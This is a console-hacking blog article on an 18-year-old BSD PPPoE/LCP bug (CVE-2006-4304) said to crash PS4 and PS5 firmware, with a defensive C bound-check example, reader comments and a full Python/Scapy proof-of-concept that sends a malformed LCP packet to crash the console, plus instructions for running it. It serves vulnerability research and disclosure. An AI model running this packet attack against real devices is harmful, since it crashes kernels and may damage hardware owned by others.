Is an 18-year-old vulnerability the key to the next PS5/PS4 Jailbreak?
What initially looked like a troll might turn out to be an actual PS4/PS5 vulnerability. While people shouldn’t get their hopes up just yet, as this might fizzle, it’s more interesting than it initially looked on the surface.
Discussions about an 18-year-old CVE have been making the rounds of PS4/PS5 hacking Discords, forums, and Twitter over the past few days. Some people have been claiming that a network bug disclosed in 2006 could be leveraged to Jailbreak recent PS4 and PS5 firmwares, and that this might even be the vulnerability (or one of the vulnerabilities in a chain) used by TheFloW in one of his most recent PlayStation bug bounties.
Early tests seem to indicate that a crash is indeed present in PS4 up to 11.00 included, and PS5 8.20 included. (Which would put the patch for this issue at firmwares PS5 8.40 and PS4 11.02)
I’ll be the first to admit I initially dismissed the original message as a troll, but it seems the claim has legs: a PoC (proof of concept) file has been circulating, and multiple people confirm it crashes their PS4 and PS5, up to the firmwares mentioned above. Now, a crash in itself is certainly not a vulnerability (let alone an exploitable one), but this means the claim is now leaving the “troll” territory and becomes worth looking into. And there’s more…
CVE from 2006 and PS4/PS5 crash PoC
Before people become overly excited, I’d like to say that this should still be considered as a rumor, or, at the very least, something that could fizzle, until more skilled devs actually dig into the issue. However, here’s what happened so far:
- An old CVE from 2006 (CVE-2006-4304) was initially reported by some anonymous user to be a “PS4/PS5 KEX” a few days ago. Multiple people, including myself, initially dismissed the claim: “There’s no way an 18-year-old FreeBSD 4 bug is present on the PS4 or the PS5, which are based on FreeBSD 9 or above”.
- However, several folks have tested the PoC that’s been circulating (please note that @Colek, who provided this PoC on their GitHub, is not the person who initially made the claims) and have confirmed that it crashes their PS4/PS5 consoles, up to some specific firmwares (apparently up to PS4 11.00 and PS5 8.20 included).

Screenshots courtesy of hhk2003
What the CVE is about:
Buffer overflow in the sppp driver in FreeBSD 4.11 through 6.1, NetBSD 2.0 through 4.0 beta before 20060823, and OpenBSD 3.8 and 3.9 before 20060902 allows remote attackers to cause a denial of service (panic), obtain sensitive information, and possibly execute arbitrary code via crafted Link Control Protocol (LCP) packets with an option length that exceeds the overall length, which triggers the overflow in (1) pppoe and (2) ippp.
This appears to be a bug in the network stack of FreeBSD/NetBSD: the LCP option parser trusted each option’s own length field without checking it against the length of the packet that carried it. Setting aside for a minute how crazy it would be that an 18-year-old vulnerability is still present in modern consoles, at the very least this is an area of the code that we know TheFloW has been investigating a lot in the past (the only known PS5 Kernel exploit was from TheFloW and is related to the network stack as well).
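As an added example (not from the article, the PoC, or any BSD source), here is the kind of bound check an LCP option walker needs to avoid the CVE-2006-4304 bug class: each option’s declared length is validated against the bytes the LCP length field actually covers before the walker moves on. The two sample packets are constructed; the malformed one mirrors the shape of the PoC’s LCP payload (length field 7, option length 0xff).

```c
#include <stddef.h>
#include <stdint.h>

/* Result of validating an LCP option list. */
enum lcp_result {
    LCP_OK = 0,
    LCP_ERR_SHORT_HEADER,   /* fewer than the 4 LCP header bytes */
    LCP_ERR_BAD_LENGTH,     /* LCP length field does not fit the buffer */
    LCP_ERR_OPTION_OVERRUN  /* an option claims more bytes than remain */
};

/* Walk an LCP packet: code, id, 16-bit length, then options of the form
 * type, length, data (length counts its own two header bytes).
 * The check CVE-2006-4304 lacked is the one against `remaining`: an option
 * must never claim more bytes than the LCP length field leaves. */
enum lcp_result lcp_walk_options(const uint8_t *pkt, size_t pkt_len, size_t *nopts)
{
    size_t declared, off = 4, count = 0;
    if (pkt_len < 4)
        return LCP_ERR_SHORT_HEADER;
    declared = ((size_t)pkt[2] << 8) | pkt[3];
    if (declared < 4 || declared > pkt_len)
        return LCP_ERR_BAD_LENGTH;
    while (off < declared) {
        size_t remaining = declared - off, olen;
        if (remaining < 2)                 /* no room for type + length */
            return LCP_ERR_OPTION_OVERRUN;
        olen = pkt[off + 1];
        if (olen < 2 || olen > remaining)  /* the missing bound check */
            return LCP_ERR_OPTION_OVERRUN;
        off += olen;
        count++;
    }
    if (nopts)
        *nopts = count;
    return LCP_OK;
}
/* Number of options in a valid packet, or -1 if validation fails. */
int lcp_option_count(const uint8_t *pkt, size_t pkt_len)
{
    size_t n = 0;
    return lcp_walk_options(pkt, pkt_len, &n) == LCP_OK ? (int)n : -1;
}
/* Constructed samples (not captured from a console). Well-formed: length 10,
 * MRU option (type 1, len 4, value 1500) and PFC option (type 7, len 2). */
const uint8_t lcp_good[] = { 0x01, 0x01, 0x00, 0x0a, 0x01, 0x04, 0x05, 0xdc, 0x07, 0x02 };
/* Malformed, shaped like the PoC's LCP payload: length 7, option claiming 0xff bytes. */
const uint8_t lcp_bad[] = { 0x01, 0x01, 0x00, 0x07, 0xab, 0xff, 0xff, 0xff };
```

Truncating `lcp_bad` to its first 6 bytes reproduces the PoC’s first probe, where the LCP length field itself exceeds the bytes received and the walker rejects the packet before looking at any option.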
The PoC:
from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump

source = b"\xXX\xXX\xXX\xXX\xXX\xXX"  # MAC address of your adapter on PC
destination = b"\xXX\xXX\xXX\xXX\xXX\xXX"  # MAC address of LAN on your PS4
interface = "Realtek PCIe 2.5GbE Family Controller #2"  # get via "ipconfig /all" or eth0 or similar on Linux

# PPPoE discovery: wait for the console's PADI, answer with a PADO carrying its tag
packet = sniff(iface=interface, filter="pppoed", count=1)
tag_value = packet[PPPoED][0].tag_list[1].tag_value
payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)

# Wait for the PADR, answer with a PADS (session id 1)
packet = sniff(iface=interface, filter="pppoed", count=1)
payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)

# PPPoE session: send an LCP Configure-Request whose option length (0xff) exceeds the packet length (7)
packet = sniff(iface=interface, filter="pppoes", count=1)
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
packet = srp1(Ether(payload), iface=interface)
print(hexdump(packet))

# Same malformed LCP packet, padded and repeated
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256  # this number might be different, just a guess
for i in range(20):
    sendp(payload, iface=interface)
Verdict: Is there a new vulnerability on the PS4/PS5?
A few thoughts come to mind:
- In my opinion, if a bug from a CVE has been fixed on some system, it should generally not crash that system after the patch. I understand that in some rare scenarios a crash is the only way out, but in my experience most bug fixes intend to handle an error case gracefully. A crash is not an exploit, but it is very interesting to see that this code actually crashes the PS4 and PS5.
- A likely explanation, rather than an old bug surfacing, is a new one (or similar one) that happens to be triggered by taking a similar path in the code base.
- It is also possible that some bits and pieces of the PS4/PS5 network stack are not based on FreeBSD but on some other PS4/PS5-specific code, which might still have the issue because it was never covered by the FreeBSD patches.
- It is particularly interesting to me that some more recent firmwares do not crash. This implies that Sony have fixed some issue, or modified some code in that area, in recent firmwares (which was actually strongly hinted at when PS4 11.02 and PS5 8.40 were released). This is additional confirmation that this crash could be related to a recent vulnerability that was surfaced to Sony’s engineers (e.g. one of TheFloW’s bugs is not out of the question).
- Some people have confirmed that the buggy code does, or did, exist, at some point, in the PS4’s codebase. SlidyBat over at the PS5 R&D discord in particular says that there is indeed some function in the PS4 that seems to use the old buggy code:
Download and test the PoC
It is of course too early to tell if this could lead to anything on the PS4 and PS5, but for sure this looks way more interesting than I initially thought it did, a few days ago. We’re at the very early stages of this, and although this won’t be useful to anyone without the right skills to dig further, it probably doesn’t hurt for people to try and run the PoC on their PS4 and PS5.
Feel free to give it a try and report in the comments whether this crashed your console (and which firmware you’re on).
Please understand that in its current stage, this will only crash your console, and it’s not particularly obvious to set up: you’ll need some basic scripting skills. If you can’t follow the instructions on how to edit the script and run it, I’d strongly suggest you don’t sweat it.
- Get the PoC here: https://gist.github.com/RobbedColek/8b0bc9655adc6ad9564ad71453188e37
- Requires Python 3 and Scapy.
- Connect your PS4/PS5 directly to PC via LAN cable.
- Set up your PS4/PS5 for manual ethernet connection via PPPoE – insert any username/password.
- Update the “source”, “destination”, and “interface” details in the script, according to your home PC and target console. <– If you don’t know how to do that and can’t figure it out, stop right there, this thing isn’t for you and you will not be helpful
- Use “Test Internet Connection” on console.
- Launch script.
If it worked, it will crash your console.
Reference
- Original claim: https://wololo.net/2024/01/26/ps5-update-8-60-is-here-and-guess-what-dont-update/comment-page-1/#comment-6543161
- PoC for PS4/PS5: https://gist.github.com/RobbedColek/8b0bc9655adc6ad9564ad71453188e37
- CVE: https://www.cvedetails.com/cve/CVE-2006-4304/
- OpenBSD patch to fix the 2006 vulnerability: https://ftp.openbsd.org/pub/OpenBSD/patches/3.8/common/014_sppp.patch
As always, I’ve tried to be accurate and precise in this article. If you notice something is missing or wrong, please let me know in the comments. Thanks.
This is amazing. Good work everyone who stepped in. Hopefully it won’t be long until a working BD-JB works on PS4 11.00 and PS5 8.20 or lower.
Well written and clearly presented. Great post wololo! Hopefully this can come to fruition as an exploit. In the case that this is one of the unreleased exploits reported in the bounty program, what would the repercussions be if it became public before any disclosure on their part?
Had a feeling that today may be a big day, and now this. Wow, a vuln from 2006, that’s awesome and funny.
Very interesting read, extremely curious what this might bring
Wait, is the source code for the PS4 firmware leaked?
No but you can reverse engineer it. See: https://wololo.net/2023/09/04/ps4-ps5-reverse-engineering-101-the-basics-of-ps4-exploits/
Anon, my big brother from another mother, is a hero as always 😉
Wololo, write article about this coming PS4 modchip from BwE… This is big news! 🙂
https://twitter.com/BwE_Dev/status/1747142553726816565
I’m in wait and see mode on this. Knowing BwE, it will be a chip exclusively for repairmen, most likely an improvement over something that already exists (e.g. his own take on modded warfare’s reversible firmware chip: https://wololo.net/2023/07/26/revertible-firmware-ps4-by-modded-warfare-this-could-be-the-future-of-ps4-hacks/ ) and absolutely not what you, as a reader, expect when you think of a PS4 “modchip”
I’ll of course eat my words and publicly apologize if he releases something that’s actually groundbreaking.
It crashed my console once after which it keeps giving binary responses when sending packets, but doesn’t crash.
I hope there will be something with this.
I’m stuck on version 9.55
I hope that at some point @theflow and other devs join the decentralized bounties. HackerOne is stingy and is sinking the next PS5 scene, and honestly this work is done out of pure love, but the community is too toxic sometimes and ungrateful, and in many cases doesn’t even thank the devs who make so many interesting things possible.
Is there a PS4 11.02 JB? I don’t understand.
No. Just hope. Also, 11.02 is out of the equation for this particular crash. It’s for 11.00 and lower
If this is exploitable, this might be the first real use for BD-JB on the PS4. It has more rights in non-jailbroken state than the WebKit process, and raw socket access is one of the things that is still present there. It’s been patched in WebKit after the 7.5X exploits.
Do you know what the latest ps4 fw that can exploit BD-JB is?
https://t.co/Jo6cCkpZAu azif uploaded some payload enabler for 11.02 and said to make your own exploit. Does this mean JB?
I tested the PoC two times and the ps4 only crashes on reboot/shutdown on firmware 10.01. If I try to reboot, the console will not power on afterwards and it will show the hard drive test on the next bootup. It seems to work.